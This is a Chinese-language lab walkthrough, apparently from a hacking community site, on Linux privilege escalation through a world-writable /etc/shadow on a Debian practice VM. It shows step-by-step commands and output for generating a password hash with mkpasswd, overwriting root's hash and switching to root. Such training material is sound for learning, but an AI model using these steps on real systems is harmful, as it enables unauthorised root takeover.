弱文件权限 - 可写 /etc/shadow 提权

/etc/shadow 文件包含用户密码哈希值,通常只有 root 用户才能读取该文件。

请注意,虚拟机上的 /etc/shadow 文件是可写的:

ls -l /etc/shadow

运行结果:

user@debian:~$ ls -l /etc/shadow -rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow user@debian:~$

使用您选择的密码生成新的密码哈希值:

mkpasswd -m sha-512 newpasswordhere

运行结果:

user@debian:~$ mkpasswd -m sha-512 123456
$6$mkiWXFXEV5iNPPU$CMUTIidLcY/HESckgRcoam4goW8xrCrB5C8oOKJ4pDK0QPHiSC3/tCpPLqG9o4C3F9zriFcxIar.C9T9MQ1lT/

编辑 /etc/shadow 文件,并使用刚生成的哈希值替换原始 root 用户的密码哈希值。

弱文件权限 - 可写 /etc/shadow 提权

切换到 root 用户,使用新密码:

su root

运行结果:

user@debian:~$ su root
Password:
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user#
免责声明: H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索